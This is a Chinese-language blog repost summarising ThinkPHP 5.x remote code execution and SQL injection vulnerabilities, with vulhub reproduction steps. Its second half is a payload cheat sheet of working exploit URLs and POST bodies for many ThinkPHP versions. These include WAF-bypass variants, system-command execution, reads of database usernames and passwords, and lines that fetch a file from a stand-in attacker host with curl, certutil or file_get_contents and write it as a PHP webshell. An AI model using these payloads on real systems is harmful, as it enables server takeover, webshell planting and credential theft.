<div data-zone-id="0" data-line-index="130">2019年1月11日，某安全团队公布了一篇ThinkPHP 5.0.远程代码执行漏洞文档，公布了一个ThinkPHP 5.0.远程代码执行漏洞。文章中的该漏洞与2018年12月的ThinkPHP 5.0.*远程代码执行漏洞原理相似，攻击者可利用该漏洞在一定条件下获取目标服务器的最高权限。后经研究，在一定条件下，ThinkPHP 5.1.x版本也存在该漏洞，在满足条件的情况下，攻击者可利用该漏洞执行任意代码。</div>
<div data-zone-id="0" data-line-index="131">
<h3 id="tid-NePM8d" class="heading-h3">4.3.3 漏洞分析</h3>
</div>
<div data-zone-id="0" data-line-index="132">该漏洞的漏洞关键点存在于thinkphp/library/think/Request.php文件中：</div>
<div data-zone-id="0" data-line-index="133"> </div>
<div data-zone-id="0" data-line-index="134">分析过程： ThinkPHP 5.x 远程命令执行漏洞分析与复现 | PHP 技术论坛 (learnku.com)</div>
<div data-zone-id="0" data-line-index="135"> </div>
<div data-zone-id="0" data-line-index="136"> </div>
<div data-zone-id="0" data-line-index="137">
<h3 id="tid-hNCmZ6" class="heading-h3">4.3.4 漏洞复现</h3>
</div>
<div data-zone-id="0" data-line-index="138">
<h4 id="tid-sJNKJW" class="heading-h4">环境搭建</h4>
</div>
<div data-zone-id="0" data-line-index="139">
<div data-zone-id="dh3j2jg90x" data-line-index="0"><code>/vulhub/thinkphp/5.0.23-rce</code></div>
<div data-zone-id="dh3j2jg90x" data-line-index="1"><code>docker-compose up -d</code></div>
</div>
<div data-zone-id="0" data-line-index="140">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"5b9d719a-f697-4a80-bfed-b1403a3cce1b","height":"189","width":"954","currHeight":"189","currWidth":"954","natrualHeight":"189","natrualWidth":"954","file_token":"boxcnTU7KEnfhixcNouYwGql5be","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnTU7KEnfhixcNouYwGql5be%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":16662,"comments":[],"pluginName":"imageUpload","scale":5.0476190476190474}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203755986-883249315.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="141">
<h4 id="tid-PxfPmy" class="heading-h4">验证漏洞</h4>
</div>
<div data-zone-id="0" data-line-index="142">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"1de3763c-f173-43d8-897f-899d9cf324b5","height":"482","width":"1253","currHeight":"482","currWidth":"1253","natrualHeight":"482","natrualWidth":"1253","file_token":"boxcnUD4kJk2izJMjOv3apQAX6d","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnUD4kJk2izJMjOv3apQAX6d%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":46338,"comments":[],"pluginName":"imageUpload","scale":2.599585062240664}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203806079-1100169375.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="143">命令执行</div>
<div data-zone-id="0" data-line-index="144">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"3da376b4-bd50-4cc3-a52a-d297e92dbde3","height":"269","width":"862","currHeight":"269","currWidth":"862","natrualHeight":"269","natrualWidth":"862","file_token":"boxcnyXQvDeI1a8r3D5sE8Tlo3d","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnyXQvDeI1a8r3D5sE8Tlo3d%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":11910,"comments":[],"pluginName":"imageUpload","scale":3.204460966542751}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203817889-1159932872.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="145">getshell</div>
<div data-zone-id="0" data-line-index="146">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"591b0531-0075-4540-af4e-ecb722abfac8","height":"426","width":"828","currHeight":"426","currWidth":"828","natrualHeight":"426","natrualWidth":"828","file_token":"boxcnORPBfjAhehCKYe3CVmQNUq","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnORPBfjAhehCKYe3CVmQNUq%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":25242,"comments":[],"pluginName":"imageUpload","scale":1.943661971830986}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203828245-2084866338.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="147"> </div>
<div data-zone-id="0" data-line-index="148">
<h2 id="tid-sb4TFT" class="heading-h2">4.4 Thinkphp5 SQL注入漏洞和敏感信息泄露漏洞</h2>
</div>
<div data-zone-id="0" data-line-index="149">
<h3 id="tid-nWytQf" class="heading-h3">4.4.1 漏洞概要</h3>
</div>
<div data-zone-id="0" data-line-index="150">
<blockquote>漏洞名称：Thinkphp5 SQL注入漏洞和敏感信息泄露漏洞</blockquote>
</div>
<div data-zone-id="0" data-line-index="151">
<blockquote>参考编号：无</blockquote>
</div>
<div data-zone-id="0" data-line-index="152">
<blockquote>威胁等级：严重</blockquote>
</div>
<div data-zone-id="0" data-line-index="153">
<blockquote>影响范围：ThinkPHP < 5.1.23</blockquote>
</div>
<div data-zone-id="0" data-line-index="154">
<blockquote>漏洞类型：SQL注入漏洞和敏感信息泄露漏洞</blockquote>
</div>
<div data-zone-id="0" data-line-index="155">
<blockquote>利用难度：容易</blockquote>
</div>
<div data-zone-id="0" data-line-index="156">
<h3 id="tid-cNRfdE" class="heading-h3">4.4.2 漏洞描述</h3>
</div>
<div data-zone-id="0" data-line-index="157">传入的某参数在绑定编译指令的时候又没有安全处理，预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式，在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码。</div>
<div data-zone-id="0" data-line-index="158">
<h3 id="tid-Ndxh6h" class="heading-h3">4.4.3 漏洞分析</h3>
</div>
<div data-zone-id="0" data-line-index="159">分析过程： ThinkPHP5 SQL注入漏洞 && 敏感信息泄露【通过】 - 账号审核 - 90Sec</div>
<div data-zone-id="0" data-line-index="160"> </div>
<div data-zone-id="0" data-line-index="161">
<h3 id="tid-YacaWz" class="heading-h3">4.4.4 漏洞复现</h3>
</div>
<div data-zone-id="0" data-line-index="162">
<h4 id="tid-dnZ7SP" class="heading-h4">环境搭建</h4>
</div>
<div data-zone-id="0" data-line-index="163">
<div data-zone-id="q1amvztlzp" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-ke6ZFF pre"></button>
<div class="code-tools"> </div>
<pre>/vulhub/thinkphp/in-sqlinjection
docker-compose up -d</pre>
</div>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203844896-936327005.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="165">
<h4 id="tid-WseZPi" class="heading-h4">验证漏洞</h4>
<p><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203857163-724498185.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
<div data-zone-id="0" data-line-index="167">
<h1 id="tid-5re4bs" class="heading-h1">0x05 漏洞总结</h1>
</div>
<div data-zone-id="0" data-line-index="168">下面是别人总结绕过的，未测试。</div>
<div data-zone-id="0" data-line-index="169">
<h2 id="tid-NpEZXb" class="heading-h2">5.1 thinkphp 5.0.5</h2>
</div>
<div data-zone-id="0" data-line-index="170">
<div class="cnblogs_code">
<div class="cnblogs_code_toolbar"> </div>
<button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-MYzyjs pre"></button>
<div class="code-tools"> </div>
<pre>waf对eval进行了拦截
禁止了assert函数
对eval函数后面的括号进行了正则过滤
对file_get_contents函数后面的括号进行了正则过滤<br>
http://www.xxxx.com/?s=index/think\app/invokefunction&function=call_user_func_array&vars=file_put_contents&vars[]=2.php&vars=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?></pre>
<div class="cnblogs_code_toolbar"> </div>
</div>
<p> </p>
</div>
<div data-zone-id="0" data-line-index="175"> </div>
<div data-zone-id="0" data-line-index="176">
<h2 id="tid-mGic5s" class="heading-h2">5.2 thinkphp 5.0.10</h2>
</div>
<div data-zone-id="0" data-line-index="177">
<div data-zone-id="i1cf4gokqm" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-eMRb5B pre"></button>
<div class="code-tools"> </div>
<pre>(post)public/index.php?s=index/index/index
(data)s=whoami&_method=__construct&method&filter[]=system</pre>
</div>
</div>
</div>
<div data-zone-id="0" data-line-index="178"> </div>
<div data-zone-id="0" data-line-index="179">
<h2 id="tid-nKTjzw" class="heading-h2">5.3 thinkphp 5.0.11</h2>
</div>
<div data-zone-id="0" data-line-index="180">
<div data-zone-id="bkvbwfhpt9" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-zFNGGr pre"></button>
<div class="code-tools"> </div>
<pre>http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=system&vars=curl https://www.hack.com/xxx.js -o ./upload/xxx.php</pre>
</div>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="182">
<h2 id="tid-PcBAHM" class="heading-h2">5.4 thinkphp 5.0.14</h2>
</div>
<div data-zone-id="0" data-line-index="184">
<div class="cnblogs_code">
<div class="cnblogs_code_toolbar"> </div>
<button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-Sh4FAk pre"></button>
<div class="code-tools"> </div>
<pre>eval（''）和assert（''）被拦截，命令函数被禁止
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=assert&vars=phpinfo();
http://www.xxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=assert&vars=eval($_GET)&1=call_user_func_array("file_put_contents",array("3.php",file_get_contents("https://www.hack.com/xxx.js")));

php7.2
http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=file_put_contents&vars=1.txt&vars=1
http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=file_put_contents&vars=index11.php&vars=<?=file_put_contents('index111.php',file_get_contents('https://www.hack.com/xxx.js'));?>写进去发现转义了尖括号
通过copy函数
http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=copy&vars= https://www.hack.com/xxx.js&vars=112233.php</pre>
<div class="cnblogs_code_toolbar"> </div>
</div>
<p> </p>
</div>
<div data-zone-id="0" data-line-index="189">
<h2 id="tid-YFyG45" class="heading-h2">5.5 thinkphp 5.0.18</h2>
</div>
<div data-zone-id="0" data-line-index="190">
<div data-zone-id="d423kqlkib" data-line-index="0">
<div class="cnblogs_code">
<div class="cnblogs_code_toolbar"> </div>
<button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-7z8E7P pre"></button>
<div class="code-tools"> </div>
<pre>windows
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=phpinfo&vars=1
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=assert&vars=phpinfo()

使用certutil
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=passthru&vars=cmd /c certutil -urlcache -split -f https://www.hack.com/xxx.js uploads/1.php

由于根目录没写权限，所以写到uploads</pre>
<div class="cnblogs_code_toolbar"> </div>
</div>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="191">
<h2 id="tid-H2efhf" class="heading-h2">5.6 thinkphp 5.0.21</h2>
</div>
<div data-zone-id="0" data-line-index="192">
<div data-zone-id="wiqoxap0yf" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-eB3wH7 pre"></button>
<div class="code-tools"> </div>
<pre>http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=id

http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars=phpinfo&vars[]=1</pre>
</div>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="193">
<h2 id="tid-5ZWcQy" class="heading-h2">5.7 thinkphp 5.0.22</h2>
</div>
<div data-zone-id="0" data-line-index="194">
<div data-zone-id="xc7bou53bv" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-RZp2PX pre"></button>
<div class="code-tools"> </div>
<pre>http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=id
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars=phpinfo&vars[]=1</pre>
</div>
<p> </p>
5.8 thinkphp 5.0.23</div>
</div>
<div data-zone-id="0" data-line-index="196">
<div data-zone-id="yjnfcq51me" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-S7AeTR pre"></button>
<div class="code-tools"> </div>
<pre>(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server=ls -al
Debug模式
(post)public/index.php (data)_method=__construct&filter[]=system&server=touch%20/tmp/xxx</pre>
</div>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="199">
<h2 id="tid-z45x3e" class="heading-h2">5.9 thinkphp 5.1.18</h2>
</div>
<div data-zone-id="0" data-line-index="200">
<div data-zone-id="ggupju7zdv" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-P2n6SZ pre"></button>
<div class="code-tools"> </div>
<pre>http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=file_put_contents&vars=index11.php&vars=<?=file_put_contents('index_bak2.php',file_get_contents('https://www.hack.com/xxx.js'));?>

所有目录都无写权限,base64函数被拦截
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars=assert&vars=eval($_POST)</pre>
</div>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="202">
<h2 id="tid-MKCcNn" class="heading-h2">5.10 thinkphp 5.1.*</h2>
</div>
<div data-zone-id="0" data-line-index="203"> </div>
<div data-zone-id="0" data-line-index="205">
<div class="cnblogs_code">
<div class="cnblogs_code_toolbar"> </div>
<button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-6haxw8 pre"></button>
<div class="code-tools"> </div>
<pre>http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars=phpinfo&vars[]=1
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars=phpinfo&vars[]=1
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars=system&vars[]=cmd</pre>
<div class="cnblogs_code_toolbar"> </div>
</div>
<p> </p>
<h2 id="tid-QXaamr" class="heading-h2">5.11 thinkphp 5.1.*和5.2*和5.0*</h2>
</div>
<div data-zone-id="0" data-line-index="206">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-spjZc7 pre"></button>
<div class="code-tools"> </div>
<pre> (post)public/index.php (data)c=exec&f=calc.exe&_method=filter </pre>
</div>
</div>
<div data-zone-id="0" data-line-index="209">
<h2 id="tid-NhSbYY" class="heading-h2">5.12 thinkphp 未知版本</h2>
</div>
<div data-zone-id="0" data-line-index="211">
<div data-zone-id="fleapvw98o" data-line-index="0">
<div class="cnblogs_code">
<div class="cnblogs_code_toolbar"> </div>
<button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-MBcNTa pre"></button>
<div class="code-tools"> </div>
<pre>?s=index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
index.php?s=/home/shopcart/getPricetotal/tag/1%27
index.php?s=/home/shopcart/getpriceNum/id/1%27 index.php?s=/home/user/cut/id/1%27 index.php?s=/home/service/index/id/1%27 index.php?s=/home/pay/chongzhi/orderid/1%27 index.php?s=/home/pay/index/orderid/1%27 index.php?s=/home/order/complete/id/1%27 index.php?s=/home/order/complete/id/1%27 index.php?s=/home/order/detail/id/1%27 index.php?s=/home/order/cancel/id/1%27 index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+ POST /index.php?s=/home/user/checkcode/ HTTP/1.1 Content-Disposition: form-data; name="couponid"1') union select sleep('''+str(sleep_time)+''')#</pre>
<div class="cnblogs_code_toolbar"> </div>
</div>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="212"> </div>
<div data-zone-id="0" data-line-index="213">
<h2 id="tid-kGYsww" class="heading-h2">5.13 当php7以上无法使用Assert的时候用</h2>
</div>
<div data-zone-id="0" data-line-index="214">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-dmRtQj pre"></button>
<div class="code-tools"> </div>
<pre>
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=包含&x=phpinfo();
有上传图片或者日志用这个包含就可以</pre>
</div>
</div>
<div data-zone-id="0" data-line-index="216">
<h1 id="tid-csAN2x" class="heading-h1">参考</h1>
</div>
<ol start="1">
<li data-list="number1" data-ol-id="Bq3AnUzz" data-start="1">thinkphp漏洞分析与总结 · Drunkmars's Blog</li>
<li data-list="number1" data-ol-id="Bq3AnUzz" data-start="2">thinkphp漏洞分析和总结 - 文章整合 (chowdera.com)</li>
<li data-list="number1" data-ol-id="Bq3AnUzz" data-start="3">ThinkPHP框架漏洞总结 - FreeBuf网络安全行业门户</li>
<li data-list="number1" data-ol-id="Bq3AnUzz" data-start="4">ThinkPHP 5.x RCE分析_0verWatch的博客-CSDN博客_rce分析</li>
<li data-list="number1" data-ol-id="Bq3AnUzz" data-start="5">ThinkPHP 5.x 远程命令执行漏洞分析与复现 | PHP 技术论坛 (learnku.com)</li>
<li data-list="number1" data-ol-id="Bq3AnUzz" data-start="6">ThinkPHP5 SQL注入漏洞 && 敏感信息泄露【通过】 - 账号审核 - 90Sec</li>
</ol>
<div> </div><br><br>
来源：https://www.cnblogs.com/lingzhisec/p/15728886.html

頁: [1]

琼殿技术论坛's Archiver

Think PHP漏洞总结（全系列）